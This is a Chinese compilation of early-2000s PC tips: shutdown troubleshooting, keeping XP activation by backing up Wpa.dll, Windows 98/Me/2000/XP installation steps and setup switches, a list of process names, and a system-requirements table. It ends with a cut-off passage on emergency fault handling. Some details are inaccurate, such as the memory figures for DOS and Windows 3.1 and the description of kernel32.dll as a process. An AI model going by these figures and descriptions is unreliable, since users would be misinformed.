    此外，一些BIOS本身的问题或硬件系统本身的问题也会引起不能关机故障。当你发现你安装了新的硬件在关机时出现系统挂起的情况，如显示器黑屏，键盘鼠标无响应等，那么很可能是为新硬件所配置的驱动程序有兼容性的问题。要解决这种第三方的硬件不兼容问题，一般都是到硬件厂家网站上查找解决方案，找到该设备的最新驱动程序并下载安装到你的机器系统中，一般即可解决该问题。


XP重装需要激活的问题

《一键清理系统垃圾》

XP重装需要激活的问题

由于简体中文版的Windows XP采取了激活的反盗版技术，一般重新安装Windows XP必须重新激活。其实，我们在第一次激活后，只要先备份好Windows下面的System32子目录中的Wpa.dll文件。以后重新安装Windows XP后，只需要复制该文件到Windows下System32子目录中即可激活。如果你不放心，也可以单击“开始”→“运行”，输入如下命令：oobe/msoobe /a来检测你的XP是否已经激活。

巧妙安装各种Windows操作系统

对于新购置的电脑，在完成对硬盘的分区、格式化操作以后，就需要进行Windows系统的安装了。下面就来介绍一下Windows各种版本的安装方法。

    安装Windows 98

    新安装Windows 98系统，可以使用Windows 98系统启动盘启动计算机，然后将Windows 98安装光盘放入光驱，在DOS提示符状态下，进入光盘所在驱动器，然后进入Windows 98安装目录，运行Setup命令即可开始安装Windows 98。

    在开始安装时，安装程序会自动调用Scandisk程序对电脑系统进行检测，检测通过后即进入Windows 98安装程序。当屏幕上出现“软件许可协议”对话框时，单击选中“接受协议”选项并单击“下一步”按钮，这时会要求你输入“产品密钥”，也就是我们常说的Windows 98安装序列号，完成后单击“下一步”按钮进行安装。

    Windows 98安装程序进入“正在收集计算机的相关信息”界面，并对系统进行检查，以确保有足够的硬盘空间来安装Windows 98。完成后，即可按照提示，单击“下一步”按钮，选择“典型安装”方式，输入用户名和单位名称后，进入用户区域选择窗口，区域的选择主要是确定操作系统的系统时间以及日期，可以在列表中选择“中国”，然后单击“下一步”按钮。

    在安装过程中，安装程序会询问用户是否创建启动盘，如果你还没有自己的Windows 98启动盘，那么建议选择“确定”按钮创建，否则单击“取消”按钮。在接下来的过程中，就不必我们为之操心了，安装程序会向硬盘拷贝数据，并完成最后的安装过程。文件复制结束后，会提示重新启动计算机，重启后，即可直接进入Windows 98安装程序，并在左侧显示安装剩余时间，耐心地等待过后，你就会发现，Windows 98已经被安装到系统中了。

    小技巧：

    往往我们在安装Windows 98时，通常会在命令行状态下输入Setup命令进行安装，然后运行Scandisk、扫描磁盘、制作启动盘、安装版本说明等过程，如果打算要Windows快些安装，可以在使用Setup命令的时候，使用一些参数，从而达到快速安装Windows 98的目的。Setup的参数主要包括以下几个参数：

    /t:tmp：指定存放临时文件的目录

    /id：跳过磁盘空间检查

    /ie：不制作启动盘

    /ih：不检查注册表

    /im：跳过内存检查

    /is：不执行磁盘扫描

    /iv：安装时不显示版本说明

    我们想快速安装Windows 98，就可以输入命令：setup /id/ie/ih/im/is/iv，这样安装程序就会直接进入文件复制过程，从而省下了大量的安装时间。

    安装Windows Me

    Windows Me的安装可分为升级安装和完全安装两种类型，Windows Me可以从Windows 95、Windows 98和Windows 98 SE上直接升级安装，但不能从Windows 3.x中升级。

    Windows Me提供了三种安装方式，一是使用启动盘启动计算机，并进入安装目录执行Setup程序，需要注意的是，在执行安装程序之前，需要首先运行和加载磁盘高速缓存程序Smartdrv.exe。第二种方式是使用Windows Me光盘启动，自动执行安装程序。第三种方式是，在当前的操作系统中运行Windows Me的安装程序，比如在Windows 98系统中直接运行安装程序。

    无论采用哪种安装方式，其操作过程基本都是一样的，与前面介绍的Windows 98安装程序类似。

    如果你的电脑主频低于150MHz，那么会出现“在计算机上无法安装Windows，因为处理器低于150MHz，单击‘确定’退出安装程序”的提示，这时不要着急，可以输入命令：setup/nm即可开始安装了。

    另外，Windows Me的安装程序也存在一些参数(同Windows 98)。

    安装Windows 2000和Windows XP

    Windows 2000系统的安装可以在DOS和Windows 9x系统下直接安装，在光驱中放入Windows 2000安装盘后，会自动运行Windows 2000安装程序。选择全新安装后，会要求输入产品序列号，然后即可开始复制安装文件并重新启动计算机。

    在重新启动后的界面中，按下回车键则可以开始安装Windows 2000，并进入安装目录选择窗口，同时选择需要安装的盘符。在接下来的窗口中，会要求选择文件系统的格式，为了可以高效发挥Windows 2000系统性能，建议选择“将磁盘分区转换为NTFS”，完成后按下回车键即可根据向导提示完成Windows 2000系统的安装了。

    Windows XP安装方式包括三种，分别是升级安装、双系统共存安装和全新安装。它的安装方法与Windwos 2000系统安装方法类似，这里就不多做介绍了。

    如果是在DOS方式下安装Windows 2000/XP系统，首先需要运行Smartdrv.exe命令，这样才能使安装程序可以快速地安装，否则等待的时间将是非常漫长的。

    首先，我们用Windows 98启动盘启动电脑进入DOS模式，再执行Smartdrv.exe(如果软盘里没有该文件，可以从Windows 98的安装目录下的Command目录中获取)即可载入。然后执行Windows 2000/XP安装光盘中的i386目录下的Winnt.exe文件，记住：这里不是执行Setup.exe，而是Winnt.exe。以后的操作就比较简单了。

    安装多个操作系统

    在电脑中同时安装Windows 98和Windows 2000系统，可以首先安装Windows 98，然后在Windows 98系统中运行Windows 2000安装程序，这样就可以在计算机启动界面出现多重启动菜单，移动上下光标键并回车后即可选择进入相应的系统了。如果你打算让Windows Me系统与Windows 2000共存，最简单的方法是先安装好Windows Me，然后用Windows 98启动盘或者从光盘启动，安装Windows 2000，安装时选择“全新安装”方式。

    如果你打算让Windows 98、Windows 2000和Windows XP共存，可以首先安装Windows 98，然后在Windows 98下安装Windows 2000系统，最后在Windows 2000下安装Windows XP系统，在完成安装后即可形成多重启动菜单了。

操作系统进程描述

system process
进程文件: [system process] or [system process]
进程名称: Windows内存处理系统进程
描述: Windows页面内存管理进程，拥有0级优先。
是否为系统进程: 是
alg.exe
进程文件: alg or alg.exe
进程名称: 应用层网关服务
描述: 这是一个应用层网关服务用于网络共享。
是否为系统进程: 是

csrss.exe
进程文件: csrss or csrss.exe
进程名称: Client/Server Runtime Server Subsystem
描述: 客户端服务子系统，用以控制Windows图形相关子系统。
是否为系统进程: 是

ddhelp.exe
进程文件: ddhelp or ddhelp.exe
进程名称: DirectDraw Helper
描述: DirectDraw Helper是DirectX这个用于图形服务的一个组成部分。
是否为系统进程: 是

dllhost.exe
进程文件: dllhost or dllhost.exe
进程名称: DCOM DLL Host进程
描述: DCOM DLL Host进程支持基于COM对象支持DLL以运行Windows程序。
是否为系统进程: 是

inetinfo.exe
进程文件: inetinfo or inetinfo.exe
进程名称: IIS Admin Service Helper
描述: InetInfo是Microsoft Internet Infomation Services (IIS)的一部分，用于Debug调试除错。
是否为系统进程: 是

internat.exe
进程文件: internat or internat.exe
进程名称: Input Locales
描述: 这个输入控制图标用于更改类似国家设置、键盘类型和日期格式。
是否为系统进程: 是

kernel32.dll
进程文件: kernel32 or kernel32.dll
进程名称: Windows壳进程
描述: Windows壳进程用于管理多线程、内存和资源。
是否为系统进程: 是

lsass.exe
进程文件: lsass or lsass.exe
进程名称: 本地安全权限服务
描述: 这个本地安全权限服务控制Windows安全机制。
是否为系统进程: 是

mdm.exe
进程文件: mdm or mdm.exe
进程名称: Machine Debug Manager
描述: Debug除错管理用于调试应用程序和Microsoft Office中的Microsoft Script Editor脚本编辑器。
是否为系统进程: 是

mmtask.tsk
进程文件: mmtask or mmtask.tsk
进程名称: 多媒体支持进程
描述: 这个Windows多媒体后台程序控制多媒体服务，例如MIDI。
是否为系统进程: 是

mprexe.exe
进程文件: mprexe or mprexe.exe
进程名称: Windows路由进程
描述: Windows路由进程包括向适当的网络部分发出网络请求。
是否为系统进程: 是

msgsrv32.exe
进程文件: msgsrv32 or msgsrv32.exe
进程名称: Windows信使服务
描述: Windows信使服务调用Windows驱动和程序管理在启动。
是否为系统进程: 是

mstask.exe
进程文件: mstask or mstask.exe
进程名称: Windows计划任务
描述: Windows计划任务用于设定继承在什么时间或者什么日期备份或者运行。
是否为系统进程: 是

regsvc.exe
进程文件: regsvc or regsvc.exe
进程名称: 远程注册表服务
描述: 远程注册表服务用于访问在远程计算机的注册表。
是否为系统进程: 是

rpcss.exe
进程文件: rpcss or rpcss.exe
进程名称: RPC Portmapper
描述: Windows 的RPC端口映射进程处理RPC调用(远程模块调用)然后把它们映射给指定的服务提供者。
是否为系统进程: 是

services.exe
进程文件: services or services.exe
进程名称: Windows Service Controller
描述: 管理Windows服务。
是否为系统进程: 是

smss.exe
进程文件: smss or smss.exe
进程名称: Session Manager Subsystem
描述: 该进程为会话管理子系统用以初始化系统变量，MS-DOS驱动名称类似LPT1以及COM，调用Win32壳子系统和运行在Windows登陆过程。
是否为系统进程: 是

snmp.exe
进程文件: snmp or snmp.exe
进程名称: Microsoft SNMP Agent
描述: Windows简单的网络协议代理（SNMP）用于监听和发送请求到适当的网络部分。
是否为系统进程: 是

spool32.exe
进程文件: spool32 or spool32.exe
进程名称: Printer Spooler
描述: Windows打印任务控制程序，用以打印机就绪。
是否为系统进程: 是

spoolsv.exe
进程文件: spoolsv or spoolsv.exe
进程名称: Printer Spooler Service
描述: Windows打印任务控制程序，用以打印机就绪。
是否为系统进程: 是

stisvc.exe
进程文件: stisvc or stisvc.exe
进程名称: Still Image Service
描述: Still Image Service用于控制扫描仪和数码相机连接在Windows。
是否为系统进程: 是

svchost.exe
进程文件: svchost or svchost.exe
进程名称: Service Host Process
描述: Service Host Process是一个标准的动态连接库主机处理服务。
是否为系统进程: 是

system
进程文件: system or system
进程名称: Windows System Process
描述: Microsoft Windows系统进程。
是否为系统进程: 是

taskmon.exe
进程文件: taskmon or taskmon.exe
进程名称: Windows Task Optimizer
描述: windows任务优化器监视你使用某个程序的频率，并且通过加载那些经常使用的程序来整理优化硬盘。
是否为系统进程: 是

tcpsvcs.exe
进程文件: tcpsvcs or tcpsvcs.exe
进程名称: TCP/IP Services
描述: TCP/IP Services Application支持透过TCP/IP连接局域网和Internet。
是否为系统进程: 是

winlogon.exe
进程文件: winlogon or winlogon.exe
进程名称: Windows Logon Process
描述: Windows NT用户登陆程序。
是否为系统进程: 是

winmgmt.exe
进程文件: winmgmt or winmgmt.exe
进程名称: Windows Management Service
描述: Windows Management Service透过Windows Management Instrumentation data (WMI)技术处理来自应用客户端的请求。
是否为系统进程: 是

程序进程

absr.exe
进程文件: absr or absr.exe
进程名称: Backdoor.Autoupder Virus
描述: 这个进程是Backdoor.Autoupder后门病毒程序创建的。
是否为系统进程: 否

acrobat.exe
进程文件: acrobat or acrobat.exe
进程名称: Adobe Acrobat
描述: Acrobat Writer用于创建PDF文档。
是否为系统进程: 否

acrord32.exe
进程文件: acrord32 or acrord32.exe
进程名称: Acrobat Reader
描述: Acrobat Reader是一个用于阅读PDF文档的软件。
是否为系统进程: 否

agentsvr.exe
进程文件: agentsvr or agentsvr.exe
进程名称: OLE automation server
描述: OLE Automation Server是Microsoft Agent的一部分。
是否为系统进程: 否

aim.exe
进程文件: aim or aim.exe
进程名称: AOL Instant Messenger
描述: AOL Instant Messenger是一个在线聊天和即时通讯IM软件客户端。
是否为系统进程: 否

airsvcu.exe
进程文件: airsvcu or airsvcu.exe
进程名称: Microsoft Media Manager
描述: OLE 这是一个用于在硬盘上建立索引文件和文件夹，在Microsoft Media Manager媒体管理启动时运行的进程。它可以在控制面板被禁用。
是否为系统进程: 否

alogserv.exe
进程文件: alogserv or alogserv.exe
进程名称: McAfee VirusScan
描述: McAfee VirusScan是一个反病毒软件用于扫描你的文档和E-mail中的病毒。
是否为系统进程: 否

avconsol.exe
进程文件: avconsol or avconsol.exe
进程名称: McAfee VirusScan
描述: McAfee VirusScan是一个反病毒软件用于扫描你的文档和E-mail中的病毒。
是否为系统进程: 否

avsynmgr.exe
进程文件: avsynmgr or avsynmgr.exe
进程名称: McAfee VirusScan
描述: McAfee VirusScan是一个反病毒软件用于扫描你的文档和E-mail中的病毒。
是否为系统进程: 否

backWeb.exe
进程文件: backWeb or backWeb.exe
进程名称: Backweb Adware
描述: Backweb是一个Adware（广告插件，一般是由于安装某些免费软件而伴随安装上的程序）来自Backweb Technologies。
是否为系统进程: 否

bcb.exe
进程文件: bcb or bcb.exe
进程名称: Borland C++ Builder
描述: Borland C++ Builder
是否为系统进程: 否

calc.exe
进程文件: calc or calc.exe
进程名称: Calculator
描述: Microsoft Windows计算器程序
是否为系统进程: 否

ccapp.exe
进程文件: ccapp or ccapp.exe
进程名称: Symantec Common Client
描述: Symantec公用应用客户端包含在Norton AntiVirus 2003和Norton Personal Firewall 2003。
是否为系统进程: 否

cdplayer.exe
进程文件: cdplayer or cdplayer.exe
进程名称: CD Player
描述: Microsoft Windows包含的CD播放器
是否为系统进程: 否

charmap.exe
进程文件: charmap or charmap.exe
进程名称: Windows Character Map
描述: Windows字符映射表用来帮助你寻找不常见的字符。
是否为系统进程: 否

idaemon.exe
进程文件: cidaemon or cidaemon.exe
进程名称: Microsoft Indexing Service
描述: 在后台运行的Windows索引服务，用于帮助你搜索文件在下次变得更快。
是否为系统进程:

cisvc.exe
进程文件: cisvc or cisvc.exe
进程名称: Microsoft Index Service Helper
描述: Microsoft Index Service Helper监视Microsoft Indexing Service (cidaemon.exe) 的内存占用情况，如果cidaemon.exe内存使用超过了40M，则自动重新启动该进程。
是否为系统进程: 否

cmd.exe
进程文件: cmd or cmd.exe
进程名称: Windows Command Prompt
描述: Windows控制台程序。不像旧的command.com，cmd.exe是一个32位的命令行使用在WinNT/2000/XP。
是否为系统进程: 否

cmesys.exe
进程文件: cmesys or cmesys.exe
进程名称: Gator GAIN Adware
描述: Gator GAIN是一个Adware插件（广告插件，一般是由于安装某些免费软件而伴随安装上的程序）。
是否为系统进程: 否

ctfmon.exe
进程文件: ctfmon or ctfmon.exe
进程名称: Alternative User Input Services
描述: 控制Alternative User Input Text Processor (TIP)和Microsoft Office语言条。Ctfmon.exe提供语音识别、手写识别、键盘、翻译和其它用户输入技术的支持。
是否为系统进程: 否

ctsvccda.exe
进程文件: ctsvccda or ctsvccda.exe
进程名称: Create CD-ROM Services
描述: 在Win9X创建CD-ROM访问服务。
是否为系统进程: 否

cutftp.exe
进程文件: cutftp or cutftp.exe
进程名称: CuteFTP
描述: CuteFTP是一个流行的FTP客户端用于从FTP服务器上传/下载文件。
是否为系统进程: 否

defwatch.exe
进程文件: defwatch or defwatch.exe
进程名称: Norton AntiVirus
描述: Norton Anti-Virus扫描你的文件和email以检查病毒。
是否为系统进程: 否

devldr32.exe
进程文件: devldr32 or devldr32.exe
进程名称: Create Device Loader
描述: Creative Device Loader属于Create Soundblaster驱动。
是否为系统进程: 否

directcd.exe
进程文件: directcd or directcd.exe
进程名称: Adaptec DirectCD
描述: Adaptec DirectCD是一个用文件管理器式的界面，烧录文件到光盘的软件。
是否为系统进程: 否

dreamweaver.exe
进程文件: dreamweaver or dreamweaver.exe
进程名称: Macromedia DreamWeaver
描述: Macromedia DreamWeaver是一个HTML编辑器用于创建站点和其它类别的HTML文档。
是否为系统进程: 否

em_exec.exe
进程文件: em_exec or em_exec.exe
进程名称: Logitech Mouse Settings
描述: 这是Logitech MouseWare状态栏图标的进程，用于用户访问控制鼠标属性和察看MouseWare帮助。
是否为系统进程: 否

excel.exe
进程文件: excel or excel.exe
进程名称: Microsoft Excel
描述: Microsoft Excel是一个电子表格程序包括在Microsoft Office中。
是否为系统进程: 否

findfast.exe
进程文件: findfast or findfast.exe
进程名称: Microsoft Office Indexing
描述: Microsoft Office索引程序，用于提高Microsoft Office索引Office文档的速度。
是否为系统进程: 否

frontpage.exe
进程文件: frontpage or frontpage.exe
进程名称: Microsoft FrontPage
描述: Microsoft FrontPage是一个HTML编辑器用于创建站点和其它类别的HTML文档。
是否为系统进程: 否

gmt.exe
进程文件: gmt or gmt.exe
进程名称: Gator Spyware Component
描述: Gator Spyware是一个广告插件，随Gator安装和启动。
是否为系统进程: 否

hh.exe
进程文件: hh or hh.exe
进程名称: Gator Windows Help
描述: Windows Help程序用以打开帮助文件和文档，包括在很多Windows程序中。
是否为系统进程: 否

hidserv.exe
进程文件: hidserv or hidserv.exe
进程名称: Microsoft Human Interface Device Audio Service
描述: 后台服务，用来支持USB音效部件和USB多媒体键盘。
是否为系统进程: 否

QQ.exe
进程文件: QQ or QQ.exe
进程名称: QQ
描述: QQ是一个在线聊天和即时通讯客户端。
是否为系统进程: 否

iexplore.exe
进程文件: iexplore or iexplore.exe
进程名称: Internet Explorer
描述: Microsoft Internet Explorer网络浏览器透过HTTP访问WWW万维网。
是否为系统进程: 否

kodakimage.exe
进程文件: kodakimage or kodakimage.exe
进程名称: Imaging
描述: Kodak Imaging是一个图片察看软件。包括在Windows，用以打开图像文件。
是否为系统进程: 否

loadqm.exe
进程文件: loadqm or loadqm.exe
进程名称: MSN Queue Manager Loader
描述: MSN Queue Manager Loader被随着MSN Explorer和MSN Messenger安装。他在一些时候会占用很多系统资源。
是否为系统进程: 否

loadwc.exe
进程文件: loadwc or loadwc.exe
进程名称: Load WebCheck
描述: Load WebCheck用以定制一些Internet Explorer的设定，添加、删除或者更新用户profiles设定。
是否为系统进程: 否
mad.exe
进程文件: mad or mad.exe
进程名称: System Attendant Service
描述: System Attendant Service是Microsoft Exchange Server的后台程序。它用以读取Microsoft Exchange的DLLs文件，写log信息和生成离线地址薄。
是否为系统进程: 否

mcshield.exe
进程文件: mcshield or mcshield.exe
进程名称: McAfee VirusScan
描述: McAfee VirusScan是一个反病毒软件用以扫描你的文件和email中的病毒。
是否为系统进程: 否

mgabg.exe
进程文件: mgabg or mgabg.exe
进程名称: Matrox BIOS Guard
描述: Matrox BIOS守护进程。
是否为系统进程: 否

mmc.exe
进程文件: mmmc or mmc.exe
进程名称: Microsoft Management Console
描述: Microsoft Management Console管理控制程序集成了很多的系统控制选项。例如设备管理（系统、硬件
）或者计算机权限控制（Administrative管理工具）。
是否为系统进程: 否

mobsync.exe
进程文件: mobsync or mobsync.exe
进程名称: Microsoft Synchronization Manager
描述: Internet Explorer的一个组成部分，用以在后台同步离线察看页面。
是否为系统进程: 否

mplayer.exe
进程文件: mplayer or mplayer.exe
进程名称: Windows Media Player
描述: Windows Media Player是一个用以打开音乐、声音和视频文件的软件。
是否为系统进程: 否

mplayer2.exe
进程文件: mplayer2 or mplayer2.exe
进程名称: Windows Media Player
描述: Windows Media Player是一个用以打开音乐、声音和视频文件的软件。
是否为系统进程: 否

msaccess.exe
进程文件: msaccess or msaccess.exe
进程名称: Microsoft Access
描述: Microsoft Access是一个数据库软件包括在Microsoft Office。
是否为系统进程: 否

msbb.exe
进程文件: msbb or msbb.exe
进程名称: MSBB Web3000 Spyware Application
描述: MSBB Web3000 Spyware是包括在一些adware产品中，利用注册表随Windows启动。
是否为系统进程: 否

msdtc.exe
进程文件: msdtc or msdtc.exe
进程名称: Distributed Transaction Coordinator
描述: Microsoft Distributed Transaction Coordinator控制多个服务器的传输，被安装在Microsoft Personal Web Server和Microsoft SQL Server。
是否为系统进程: 否

msiexec.exe
进程文件: msiexec or msiexec.exe
进程名称: Windows Installer Component
描述: Windows Installer的一部分。用来帮助Windows Installer package files (MSI)格式的安装文件。
是否为系统进程: 否

msimn.exe
进程文件: msimn or msimn.exe
进程名称: Microsoft Outlook Express
描述: Microsoft Outlook Express是一个Email和新闻组客户端包括在Microsoft Windows。
是否为系统进程: 否

msmsgs.exe
进程文件: msmsgs or msmsgs.exe
进程名称: MSN Messenger Traybar Process
描述: MSN Messenger是一个在线聊天和即时通讯客户端。
是否为系统进程: 否

msoobe.exe
进程文件: msoobe or msoobe.exe
进程名称: Windows Product Activation
描述: Windows XP License的Product Activation产品激活程序。
是否为系统进程: 否

mspaint.exe
进程文件: mspaint or mspaint.exe
进程名称: Microsoft Paint
描述: Microsoft Paint画图是一个图像编辑器包括在Microsoft Windows，它能够编辑bmp图像。
是否为系统进程: 否

mspmspsv.exe
进程文件: mspmspsv or mspmspsv.exe
进程名称: WMDM PMSP Service
描述: Windows Media Player 7需要安装的Helper Service。
是否为系统进程: 否

mysqld-nt.exe
进程文件: mysqld-nt or mysqld-nt.exe
进程名称: MySQL Daemon
描述: MySQL Daemon控制访问MySQL数据库。
是否为系统进程: 否

navapsvc.exe
进程文件: navapsvc or navapsvc.exe
进程名称: Norton AntiVirus Auto-Protect Service
描述: Norton Anti-Virus扫描你的文件和email中的病毒。
是否为系统进程: 否

navapw32.exe
进程文件: navapw32 or navapw32.exe
进程名称: Norton AntiVirus Agent
描述: Norton Anti-Virus扫描你的文件和email中的病毒。
是否为系统进程: 否

ndetect.exe
进程文件: ndetect or ndetect.exe
进程名称: ICQ Ndetect Agent
描述: ICQ Ndetect Agent是ICQ用来侦测网络连接的程序。
是否为系统进程: 否

netscape.exe
进程文件: netscape or netscape.exe
进程名称: Netscape
描述: Netscape网络浏览器通过HTTP浏览WWW万维网。
是否为系统进程: 否

notepad.exe
进程文件: notepad or notepad.exe
进程名称: Notepad
描述: Notepad字符编辑器用于打开文档。在Windows中附带。
是否为系统进程: 否

ntbackup.exe
进程文件: ntbackup or ntbackup.exe
进程名称: Windows Backup
描述: Windows备份工具用于备份文件和文件夹。
是否为系统进程: 否

ntvdm.exe
进程文件: ntvdm or ntvdm.exe
进程名称: Windows 16-bit Virtual Machine
描述: Windows Virtual Machine是为了兼容旧的16位Windows和DOS程序而设置的虚拟机。
是否为系统进程: 否

nvsvc32.exe
进程文件: nvsvc32 or nvsvc32.exe
进程名称: NVIDIA Driver Helper Service
描述: NVIDIA Driver Helper Service在NVIDA显卡驱动中被安装。
是否为系统进程: 否

nwiz.exe
进程文件: nwiz or nwiz.exe
进程名称: NVIDIA nView Control Panel
描述: NVIDIA nView控制面板在NVIDA显卡驱动中被安装，用于调整和设定。
是否为系统进程: 否

osa.exe
进程文件: osa or osa.exe
进程名称: Office Startup Assistant
描述: Microsoft Office启动助手，随Windows启动，增强启动、Office字体、命令和Outlook事务提醒等特性。
是否为系统进程: 否

outlook.exe
进程文件: outlook or outlook.exe
进程名称: Microsoft Outlook
描述: Microsoft Outlook是一个Email客户端包括在Microsoft Office。
是否为系统进程: 否

photoshop.exe
进程文件: photoshop or photoshop.exe
进程名称: Adobe Photoshop
描述: Adobe Photoshop是一个图像编辑软件，能够打开和编辑照片和其它更多类型格式的图片。
是否为系统进程: 否

point32.exe
进程文件: point32 or point32.exe
进程名称: Microsoft Intellimouse Monitor
描述: Microsoft Intellimouse Monitor添加一个鼠标设定图标在工具栏。
是否为系统进程: 否

powerpnt.exe
进程文件: powerpnt or powerpnt.exe
进程名称: Microsoft PowerPoint
描述: Microsoft PowerPoint是一个演示软件包括在Microsoft Office。
是否为系统进程: 否

pstores.exe
进程文件: pstores or pstores.exe
进程名称: Protected Storage Service
描述: Microsoft Protected Storage服务控制保密的内容密码。
是否为系统进程: 否

qttask.exe
进程文件: qttask or qttask.exe
进程名称: Quick Time Tray Icon
描述: Quick Time任务栏图标在你运行Quick Time的时候启动。
是否为系统进程: 否

realplay.exe
进程文件: realplay or realplay.exe
进程名称: Real Player
描述: Real Player是一个媒体播放器用来打开和播放音乐、声音和Real Media格式的视频文件。
是否为系统进程: 否

rnaapp.exe
进程文件: rnaapp or rnaapp.exe
进程名称: Windows Modem Connection
描述: Windows Modem连接控制用以控制拨号modem连接。
是否为系统进程: 否

rtvscan.exe
进程文件: rtvscan or rtvscan.exe
进程名称: Norton AntiVirus
描述: Norton Anti-Virus用以扫描你的文件和email中的病毒。
是否为系统进程: 否

rundll32.exe
进程文件: rundll32 or rundll32.exe
进程名称: Windows RUNDLL32 Helper
描述: Windows Rundll32为了需要调用DLLs的程序。
是否为系统进程: 否

sndrec32.exe
进程文件: sndrec32 or sndrec32.exe
进程名称: Windows Sound Recorder
描述: Windows录音机用以播放和录制声音文件(.wav)。
是否为系统进程: 否

sndvol32.exe
进程文件: sndvol32 or sndvol32.exe
进程名称: Windows Volume Control
描述: Windows声音控制进程在任务栏驻留用以控制音量和声卡相关。
是否为系统进程: 否

spoolss.exe
进程文件: spoolss or spoolss.exe
进程名称: Printer Spooler Subsystem
描述: Windows打印机控制子程序用以调用需要打印的内容从磁盘到打印机。
是否为系统进程: 否

starter.exe
进程文件: starter or starter.exe
进程名称: Creative Labs Ensoniq Mixer Tray icon
描述: 状态栏图标在Creative Sound Mixer中被安装。为了Creative声卡 (Soundblaster)。
是否为系统进程: 否

systray.exe
进程文件: systray or systray.exe
进程名称: Windows Power Management
描述: Windows电源管理程序用以控制节能和恢复启动。
是否为系统进程: 否

tapisrv.exe
进程文件: tapisrv or tapisrv.exe
进程名称: TAPI Service
描述: Windows Telephony (TAPI) 的后台服务程序。
是否为系统进程: 否

userinit.exe
进程文件: userinit or userinit.exe
进程名称: UserInit Process
描述: UserInit程序运行登陆脚本，建立网络连接和启动Shell壳。
是否为系统进程: 否

visio.exe
进程文件: visio or visio.exe
进程名称: Microsoft Visio
描述: Microsoft Visio是一个图形化管理软件。
是否为系统进程: 否

vptray.exe
进程文件: vptray or vptray.exe
进程名称: Norton AntiVirus
描述: Norton Anti-Virus扫描你的文件和email中的病毒。
是否为系统进程: 否

vshwin32.exe
进程文件: vshwin32 or vshwin32.exe
进程名称: McAfee VirusScan
描述: McAfee VirusScan是一个反病毒软件用以扫描你的文件和email中的病毒。
是否为系统进程: 否

vsmon.exe
进程文件: vsmon or vsmon.exe
进程名称: True Vector Internet Monitor
描述: True Vector Internet Monitor是ZoneAlarm个人防火墙的一部分，用以监视网络流经数据和攻击。
是否为系统进程: 否

vsstat.exe
进程文件: vsstat or vsstat.exe
进程名称: McAfee VirusScan
描述: McAfee VirusScan是一个反病毒软件用以扫描你的文件和email中的病毒。
是否为系统进程: 否

wab.exe
进程文件: wab or wab.exe
进程名称: Address Book
描述: 在Outlook中的地址薄。用来存放email地址、联系信息。
是否为系统进程: 否

webscanx.exe
进程文件: webscanx or webscanx.exe
进程名称: McAfee VirusScan
描述: McAfee VirusScan是一个反病毒软件用以扫描你的文件和email中的病毒。
是否为系统进程: 否

winamp.exe
进程文件: winamp or winamp.exe
进程名称: WinAmp
描述: WinAmp Media Player是一个用来打开音乐、声音和视频文件以及用以管理Mp3文件的软件。
是否为系统进程: 否

winhlp32.exe
进程文件: winhlp32 or winhlp32.exe
进程名称: Windows Help
描述: Windows帮助文件察看程序，用来打开帮助文档。该程序被包括在很多的Windows程序中。
是否为系统进程: 否

winoa386.mod
进程文件: winoa386 or winoa386.mod
进程名称: MS-DOS Console
描述: Windows MS-DOS控制台用以DOS命令和脚本。
是否为系统进程: 否

winproj.exe
进程文件: winproj or winproj.exe
进程名称: Microsoft Project
描述: Microsoft Project是一个项目计划编制程序。
是否为系统进程: 否

winroute.exe
进程文件: winroute or winroute.exe
进程名称: WinRoute
描述: WinRoute是一个基于Windows的防火墙/路由/连接共享软件。
是否为系统进程: 否

winword.exe
进程文件: winword or winword.exe
进程名称: Microsoft Word
描述: Microsoft Word是一个字处理程序包括在Microsoft Office。
是否为系统进程: 否

winzip32.exe
进程文件: winzip32 or winzip32.exe
进程名称: WinZip
描述: WinZip是一个文件压缩工具，用于创建，打开和解压zip文件。
是否为系统进程: 否

wkcalrem.exe
进程文件: wkcalrem or wkcalrem.exe
进程名称: Microsoft Works Calendar Reminder
描述: Microsoft Works Calendar Reminders工作日程提醒，在后台处理和显示弹出计划的工作日志提醒。
是否为系统进程: 否

wkqkpick.exe
进程文件: wkqkpick or wkqkpick.exe
进程名称: WinZip traybar icon
描述: WinZip的状态栏图标，被允许在Winzip启动时启动。
是否为系统进程: 否

wmplayer.exe
进程文件: wmplayer or wmplayer.exe
进程名称: Windows Media Player
描述: Windows Media Player是一个用来打开和播放音乐，声音和视频的软件。
是否为系统进程: 否

wordpad.exe
进程文件: wordpad or wordpad.exe
进程名称: Wordpad
描述: Wordpad是一个字符编辑器用以打开和编辑txt和rtf档。
是否为系统进程: 否

wowexec.exe
进程文件: wowexec or wowexec.exe
进程名称: Windows On Windows Execution Process
描述: Windows On Windows Execution Support Process和ntvdm.exe作用类似，为了兼容16位应用程序。
是否为系统进程: 否

ypager.exe
进程文件: ypager or ypager.exe
进程名称: Yahoo Messenger Helper
描述: Yahoo Messenger的状态栏图标，随Yahoo Messenger运行，是其一部分。
是否为系统进程: 否

操作系统与系统配置

操作系统 最少需要的硬盘空间 最少需要的内存容量 其它

DOS 50MB 32MB
Windows 3.1 100MB 32MB
Windows 95 500MB 32MB
Windows 98 500MB 64MB
Windows ME 2GB(由于存在系统还原) 96MB
Windows 2000 Professional 2GB 128MB 分别支持1个
Windows 2000 Server 2GB 192MB 2个
Windows 2000 Advanced Server 2GB 256MB 4个以上中央处理器
Windows XP Home 2GB 128MB
Windows XP Professional 2GB 128MB
Windows NT 4.0 Workstation 1GB 64MB
Windows NT 4.0 Server 1GB 128MB
Windows NT 4.0 Enterprise 2GB 192MB
Linux 2GB 64MB

常遇电脑故障应急处理方法
转自天极网
朋友们在使用电脑的过程中，难免会遇到许多的突发故障，这些故障的起因可能是软件原因造成的，也可能是硬件故障引发的，或是其它的因素……那么，我们这些初级的电脑用户们又该如何应对这些事件呢，请看下文：

    遭遇停电

<现象：显示器，主机，音箱等会在一瞬间“强行关闭”。

    现象分析：这是突然“停电”造成的。由停电的瞬间产生的电压波动会冲击电脑硬件的芯片，电路，电阻等。而一旦停电时您正在进行磁盘读写操作，则有可能产生坏道，或当你在编写文稿时，则数据资料就会丢失……

